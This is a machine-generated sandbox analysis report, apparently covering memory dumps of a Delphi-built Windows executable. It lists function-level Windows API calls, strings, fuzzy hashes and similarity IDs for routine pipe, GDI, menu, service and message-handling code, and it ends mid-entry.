Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03d8fc2ea0ccbe040dd23fe5e579a08a82d0369558acccf0b3afbf562ef4be68
Instruction ID: 8ab2aa419bfa915e155f0bb89bded2acecdd04dfb54a74f27e35794147abde67
Opcode Fuzzy Hash: 03d8fc2ea0ccbe040dd23fe5e579a08a82d0369558acccf0b3afbf562ef4be68
Instruction Fuzzy Hash: 9D120D74B001199FDB00EBA9D886E9EB7F5BF48304F544569F900FB392CA79ED018B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040B374, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 178pipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0040B3C6
SetHandleInformation.KERNEL32(?,00000001,00000000,?,?,0000000C,00000000), ref: 0040B430
CreatePipe.KERNEL32(?,?,0000000C,00000000,?,00000001,00000000,?,?,0000000C,00000000), ref: 0040B445

Strings

hzK, xrefs: 0040B37A
Create process failed with, xrefs: 0040B4D6
Stdin pipe creation failed, xrefs: 0040B454
0, xrefs: 0040B4D0
Stdout pipe creation failed, xrefs: 0040B3D5

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: CreatePipe$HandleInformation
String ID: 0$Create process failed with$Stdin pipe creation failed$Stdout pipe creation failed$hzK
API String ID: 2291520326-2744615025
Opcode ID: 47db4b5c90fa49efb91389dbfefd0d28370fe7558e3127d9b6638a402e08e849
Instruction ID: b83ad343a6ffeac5aab743dc2afb1b1c61ec77164cee0b24b622759b0de65b9e
Opcode Fuzzy Hash: 47db4b5c90fa49efb91389dbfefd0d28370fe7558e3127d9b6638a402e08e849
Instruction Fuzzy Hash: 03712F3090010AEBDF00DF55C945BDEB775FF54308F10816AF908AA292D779DA55CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0042E04C, Relevance: 21.2, APIs: 14, Instructions: 238windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0042E84C: GetDC.USER32(00000000), ref: 0042E8D1
Part of subcall function 0042E84C: GetDeviceCaps.GDI32(0042D120,0000000C), ref: 0042E8ED
Part of subcall function 0042E84C: GetDeviceCaps.GDI32(0042D120,0000000E), ref: 0042E8FA
Part of subcall function 0042E84C: CreateHalftonePalette.GDI32(0042D120,00000000), ref: 0042E92F
Part of subcall function 0042E84C: ReleaseDC.USER32 ref: 0042E940

SelectPalette.GDI32(?,00000000,000000FF), ref: 0042E09D
RealizePalette.GDI32(?), ref: 0042E0AC
GetDeviceCaps.GDI32(?,0000000C), ref: 0042E0BE
GetDeviceCaps.GDI32(?,0000000E), ref: 0042E0CE
GetBrushOrgEx.GDI32(?,?,?,0000000E,?,0000000C), ref: 0042E10E
SetStretchBltMode.GDI32(?,00000004), ref: 0042E11C
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,?,0000000E,?,0000000C), ref: 0042E134
SetStretchBltMode.GDI32(00000000,00000003), ref: 0042E152
CreateCompatibleDC.GDI32(00000000), ref: 0042E1B6
SelectObject.GDI32(?,?), ref: 0042E1CE
SelectObject.GDI32(?,00000000), ref: 0042E246
DeleteDC.GDI32(00000000), ref: 0042E255

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
String ID:
API String ID: 2414602066-0
Opcode ID: ef0f0c2ccb2df759310a8f2b9a85d4969f356ebb2c82521fdcc70969425c6b97
Instruction ID: f3e7376e0ef114e429a678c103fad5df37b91a90583c1ffba9fbefb53b1d9f24
Opcode Fuzzy Hash: ef0f0c2ccb2df759310a8f2b9a85d4969f356ebb2c82521fdcc70969425c6b97
Instruction Fuzzy Hash: 83A1D275A00258EFCB40DFA9C995E9EBBF8AB08314F558596F904EB361C674ED40CB28

Uniqueness

Uniqueness Score: -1.00%

Function 0046405C, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 63registryclipboardwindowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32 ref: 00464075
RegisterClipboardFormatA.USER32 ref: 00464082
RegisterClipboardFormatA.USER32 ref: 00464091
RegisterClipboardFormatA.USER32 ref: 004640A0
SendMessageA.USER32(00000000,7880FC45,00000000,00000000), ref: 004640C6
SendMessageA.USER32(00000000,89FC558B,00000000,00000000), ref: 004640F5

Strings

MSH_WHEELSUPPORT_MSG, xrefs: 0046408C
MouseZ, xrefs: 00464070
MSWHEEL_ROLLMSG, xrefs: 0046407D
Magellan MSWHEEL, xrefs: 0046406B
MSH_SCROLL_LINES_MSG, xrefs: 0046409B

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardFormatRegister$MessageSend$FindWindow
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 1416857345-3736581797
Opcode ID: 4eae1880a05a716c46fc59ca8ed8878236d789deb9afd73d3ed961b2626242c1
Instruction ID: 2308c18ecb525d86d1a2b3a33ea877691bd2a5ad282b431c2740a6343072fc91
Opcode Fuzzy Hash: 4eae1880a05a716c46fc59ca8ed8878236d789deb9afd73d3ed961b2626242c1
Instruction Fuzzy Hash: 8321ED70A00209EFDB05DF99C845BEEB7B4FF96704F108596E9149B390E7B85D80CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0040717C, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104serviceCOMMON

Download Yara Rule

APIs

OpenServiceA.ADVAPI32(?,00000000,00000004), ref: 004071BD
QueryServiceStatus.ADVAPI32(?,?,?,00000000,00000004), ref: 004071CC
CloseServiceHandle.ADVAPI32(?,?,?,?,00000000,00000004), ref: 004071DC
GetLastError.KERNEL32(?,?,?,?,00000000,00000004), ref: 004071E1
CloseServiceHandle.ADVAPI32(?,?,?,?,00000000,00000004), ref: 004072BD

Strings

The specified handle is invalid., xrefs: 00407236
Unknown error occurred, xrefs: 0040726C
The specified handle was not opened with SERVICE_QUERY_STATUS access., xrefs: 00407200
8ZK, xrefs: 00407182
0, xrefs: 00407266

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$CloseHandle$ErrorLastOpenQueryStatus
String ID: 0$8ZK$The specified handle is invalid.$The specified handle was not opened with SERVICE_QUERY_STATUS access.$Unknown error occurred
API String ID: 120336427-979423447
Opcode ID: 8589f080241e72cb9b1421aebfdef7cdc30080b217642726d70757a6261de5d9
Instruction ID: 956b6e8678badab556340429ab23e4a934da90b3dd829850aafe1a0e0a4b3981
Opcode Fuzzy Hash: 8589f080241e72cb9b1421aebfdef7cdc30080b217642726d70757a6261de5d9
Instruction Fuzzy Hash: 1D41213090010E9BDF00EFA5C5456DDB7B5FF59308F24816BE805B6256E738AE16CB6B

Uniqueness

Uniqueness Score: -1.00%

Function 0047C2B0, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0047C0F8: VirtualQuery.KERNEL32(?,?,0000001C,?,0047C2D5,00000400,?,00440781), ref: 0047C117
Part of subcall function 0047C0F8: GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,?,0047C2D5,00000400,?,00440781), ref: 0047C13B
Part of subcall function 0047C0F8: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,0000001C,?,0047C2D5,00000400,?,00440781), ref: 0047C156
Part of subcall function 0047C0F8: LoadStringA.USER32 ref: 0047C20C

CharToOemA.USER32 ref: 0047C2FC
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?,00000400,?,00440781), ref: 0047C31C
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?,00000400,?,00440781), ref: 0047C322
GetStdHandle.KERNEL32(000000F4,0047C388,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400,?,00440781), ref: 0047C336
WriteFile.KERNEL32(00000000,000000F4,0047C388,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0047C33C
LoadStringA.USER32 ref: 0047C35D
MessageBoxA.USER32 ref: 0047C374

Strings

hL, xrefs: 0047C2D5
pG, xrefs: 0047C349

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID: hL$pG
API String ID: 185507032-2235463332
Opcode ID: f1ed3af75b6a42e8639b915b30800a1c9a493ae108d5408699bd2120bbf16084
Instruction ID: 7ff7fe50b09764c829e3c48dc31a162056fc6ce3c64ca6370d48bc8573e9e401
Opcode Fuzzy Hash: f1ed3af75b6a42e8639b915b30800a1c9a493ae108d5408699bd2120bbf16084
Instruction Fuzzy Hash: FB1115B1944108ABD740E7A5CCC2FDE77BC9B04314F5086ABB718E71A2DA74AE448B79

Uniqueness

Uniqueness Score: -1.00%

Function 0043A228, Relevance: 15.1, APIs: 10, Instructions: 83windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 0043A273
DeleteMenu.USER32(?,0000F130,00000000,00000000,00000000), ref: 0043A295
DeleteMenu.USER32(?,00000007,00000400,?,0000F130,00000000,00000000,00000000), ref: 0043A2A5
DeleteMenu.USER32(?,00000005,00000400,?,00000007,00000400,?,0000F130,00000000,00000000,00000000), ref: 0043A2B5
DeleteMenu.USER32(?,0000F030,00000000,?,00000005,00000400,?,00000007,00000400,?,0000F130,00000000,00000000,00000000), ref: 0043A2C5
DeleteMenu.USER32(?,0000F020,00000000,?,0000F030,00000000,?,00000005,00000400,?,00000007,00000400,?,0000F130,00000000,00000000), ref: 0043A2D5
DeleteMenu.USER32(?,0000F000,00000000,?,0000F020,00000000,?,0000F030,00000000,?,00000005,00000400,?,00000007,00000400,?), ref: 0043A2E5
DeleteMenu.USER32(?,0000F120,00000000,?,0000F000,00000000,?,0000F020,00000000,?,0000F030,00000000,?,00000005,00000400,?), ref: 0043A2F5
EnableMenuItem.USER32 ref: 0043A316
EnableMenuItem.USER32 ref: 0043A335

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: d23f89d1b0ef1d2b3fc86fb73b4fe9b810dc508a11f373260d082e6260c652d4
Instruction ID: cf3b460b9ce547b3c8d103c623dd2f6ed0acd771cf146ffcd4e7e41478c79d04
Opcode Fuzzy Hash: d23f89d1b0ef1d2b3fc86fb73b4fe9b810dc508a11f373260d082e6260c652d4
Instruction Fuzzy Hash: BB318434B48304BBDB10DBA8C95EF9EB7E46F04709F104095FA44AF2D2C7B9AA41D718

Uniqueness

Uniqueness Score: -1.00%

Function 0044F28C, Relevance: 13.6, APIs: 9, Instructions: 127windowCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0044F2CA
GetDCEx.USER32(?,00000000,00000402), ref: 0044F2DD
SelectObject.GDI32(?,00000000), ref: 0044F303
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 0044F32D
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 0044F357
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 0044F37E
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 0044F3A2
SelectObject.GDI32(?,?), ref: 0044F3AF
ReleaseDC.USER32 ref: 0044F3C9

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$DesktopReleaseWindow
String ID:
API String ID: 1187665388-0
Opcode ID: 0adb193d7332ab2554d2b6299e0c8a3cf9baa45f3eda7f6daccb44da84fddcf2
Instruction ID: 844e56e01ecae723cf19df1dabe2128c75fcb272f31b3dbc5114f1999c74e6b1
Opcode Fuzzy Hash: 0adb193d7332ab2554d2b6299e0c8a3cf9baa45f3eda7f6daccb44da84fddcf2
Instruction Fuzzy Hash: 884159B2E0020AAFCB40DFEDC985EEFBBF8AB09304F508555F614F7251D679A9018B64

Uniqueness

Uniqueness Score: -1.00%

Function 004390A8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 164windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000080,00000001,00000000), ref: 004390E8
SendMessageA.USER32(00000000,00000080,00000001,00000000), ref: 00439101
GetWindowLongA.USER32 ref: 004391C3
SetWindowLongA.USER32 ref: 004391E7
SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013), ref: 00439203
SendMessageA.USER32(?,0000B049,?,?), ref: 004392A9

Strings

MDICLIENT, xrefs: 00439186

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$Long
String ID: MDICLIENT
API String ID: 3430364388-871263795
Opcode ID: b7710ef7d0cc103b0b8746ed153ff186f5d2b39fc85670f3871143ddf0c7cb2e
Instruction ID: 38312a6c719ff5d4fa6cf09d6988c8b857660bd8cdb174052c77001d123b1fd5
Opcode Fuzzy Hash: b7710ef7d0cc103b0b8746ed153ff186f5d2b39fc85670f3871143ddf0c7cb2e
Instruction Fuzzy Hash: D661A974A04204EFDB10EB99C985FAE77F4AB08304F2451A6F914AB3A2C775AF409B59

Uniqueness

Uniqueness Score: -1.00%

Function 0042C2BC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 130fileCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042C367
MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042C387
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042C3B6
GetEnhMetaFileHeader.GDI32(00000000,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042C3DF
DeleteEnhMetaFile.GDI32(00000000), ref: 0042C403
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000000,00000000,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?), ref: 0042C416

Strings

`, xrefs: 0042C34C

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMeta$Bits$DeleteHeader
String ID: `
API String ID: 1990453761-2679148245
Opcode ID: 216bc8e76a609dd72d022a6092e9fbb0d61a431e7218b268e0a87b6d2bc9dacd
Instruction ID: 6098b6b3cb368827f6af68aadf1cfa81bc14634b89d0989c1371cd2a3793c743
Opcode Fuzzy Hash: 216bc8e76a609dd72d022a6092e9fbb0d61a431e7218b268e0a87b6d2bc9dacd
Instruction Fuzzy Hash: 7851D5B4E00219EFDB00EFA9D985AAEB7F9FF08304F50855AE904E7251E7399D41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040F020, Relevance: 12.4, APIs: 8, Instructions: 369windowCOMMON

Download Yara Rule

APIs

DrawFocusRect.USER32 ref: 0040F265
InflateRect.USER32(?,000000FF,000000FF), ref: 0040F30F
InflateRect.USER32(?,000000FF,000000FF), ref: 0040F380
DrawFrameControl.USER32 ref: 0040F398
InflateRect.USER32(?,000000FF,000000FF), ref: 0040F3BC
OffsetRect.USER32(?,00000001,00000001), ref: 0040F3E3
InflateRect.USER32(?,000000FC,000000FC), ref: 0040F475
DrawFocusRect.USER32 ref: 0040F4B9

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Inflate$Draw$Focus$ControlFrameOffset
String ID:
API String ID: 1572492428-0
Opcode ID: 60b036dd88af687b1e70f503f9fb0740ffc0c106aef426cb381ade6b2119c22f
Instruction ID: 9822f22ce014ddec5008c983df144ca82a8702b176828aac39b23b0d4af0f44e
Opcode Fuzzy Hash: 60b036dd88af687b1e70f503f9fb0740ffc0c106aef426cb381ade6b2119c22f
Instruction Fuzzy Hash: DCF12D74A04148EFDB00EBA8C989EEEB7F4AF08304F1441F5E814AB392CB75AE45DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00452204, Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,?), ref: 004523EC
MulDiv.KERNEL32(?,?,?), ref: 00452430

Strings

(E, xrefs: 00452516, 0045256A, 00452521
(E, xrefs: 00452448, 00452435, 004523A4, 0045244B

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: (E$(E
API String ID: 0-3237547482
Opcode ID: 6168cda30455c8ba53e256003b84721ffb2924c2a158141b906f7d0e03807e73
Instruction ID: f42d65ffcb98e1d52c395ccdce1315378a6b075c007484d6d8bdf191fa4be2fc
Opcode Fuzzy Hash: 6168cda30455c8ba53e256003b84721ffb2924c2a158141b906f7d0e03807e73
Instruction Fuzzy Hash: 8F02D774A00209DFCB04CFA8C584AAEBBF6FF49311F1481A6E854AB366D774ED46CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004A7066, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 227COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(0EEDFADE,C0000025,00000008,?,00000004,?,?,?,?,?,?,00000004,?,004082DB,004080AA), ref: 004A7139
RaiseException.KERNEL32(0EEFFACE,00000001,00000003,?), ref: 004A7322

Strings

xx.cpp, xrefs: 004A70D2
cctrAddr, xrefs: 004A72A7
xx.cpp, xrefs: 004A72A2
typeID || (reThrow && (flags & XDF_ISDELPHIEXCEPTION)), xrefs: 004A70D7

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID: cctrAddr$typeID || (reThrow && (flags & XDF_ISDELPHIEXCEPTION))$xx.cpp$xx.cpp
API String ID: 3997070919-2095381217
Opcode ID: d7fda9fd997faf2b030b4c9a6e51df7bbbc93ea5b829ea6ae4b3f3cefd70fad5
Instruction ID: cbec9b69fd254f18ae2497c7725d256468112e421746e3917a6d837f3ce5539e
Opcode Fuzzy Hash: d7fda9fd997faf2b030b4c9a6e51df7bbbc93ea5b829ea6ae4b3f3cefd70fad5
Instruction Fuzzy Hash: 03A14975A05208AFCB24CF95D885E9EBBB1FF49314F1981AAF90867391D335D881CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004401EC, Relevance: 10.6, APIs: 7, Instructions: 116windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32 ref: 00440209
IsWindowUnicode.USER32(?), ref: 00440224
PeekMessageW.USER32 ref: 00440248
PeekMessageA.USER32 ref: 00440264
TranslateMessage.USER32(?), ref: 00440308
DispatchMessageW.USER32 ref: 00440317
DispatchMessageA.USER32 ref: 00440322

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
String ID:
API String ID: 2190272339-0
Opcode ID: 81b3b265fce626ffe98bf255b9a9e59ca016d184f6257601a053545c1717787e
Instruction ID: 8b336f400996464c47c6e163e882023d8c7c9d330cb20b2e95b9e62f8c1a8498
Opcode Fuzzy Hash: 81b3b265fce626ffe98bf255b9a9e59ca016d184f6257601a053545c1717787e
Instruction Fuzzy Hash: 38412330E04244BBEF10DAA9C985BDEBBB46F05304F5440D6EA40B7292C7B99E95C759

Uniqueness

Uniqueness Score: -1.00%

Function 0042D268, Relevance: 10.6, APIs: 7, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 0042A080: GetObjectA.GDI32(00000000,00000004,0042F725), ref: 0042A0A4
Part of subcall function 0042A080: GetPaletteEntries.GDI32(00000000,00000000,00000000,?), ref: 0042A0D1

GetDC.USER32(00000000), ref: 0042D2B4
CreateCompatibleDC.GDI32(?), ref: 0042D2C0
SelectObject.GDI32(?,?), ref: 0042D2D0
SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,0042D32B,?,?,?,?,00000000), ref: 0042D2F7
SelectObject.GDI32(?,?), ref: 0042D311
DeleteDC.GDI32(?), ref: 0042D31A
ReleaseDC.USER32 ref: 0042D325

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
String ID:
API String ID: 4046155103-0
Opcode ID: 2b3533130c8e9076ede0ba7b42e63dc7c5b7ff88a6f81ad62858f6d68a6b82df
Instruction ID: f1d90016f3fb013f9fb12f98cba252a219aa3734ae82f5e55970af4ba5a69621
Opcode Fuzzy Hash: 2b3533130c8e9076ede0ba7b42e63dc7c5b7ff88a6f81ad62858f6d68a6b82df
Instruction Fuzzy Hash: B4214F71E04219AFCB40EFE9D955BEEB7F8FB08300F90846AF504E7250D6789A40CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00424080, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoA.USER32 ref: 004240DD
SetMenuItemInfoA.USER32(?,00000000,000000FF,0000002C), ref: 00424133
DrawMenuBar.USER32(00000000,?,00000000,000000FF,0000002C), ref: 00424143

Strings

P, xrefs: 004240CA
,, xrefs: 004240B3
wJB, xrefs: 0042409B, 004240A8, 004240E6, 00424101, 0042413C

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
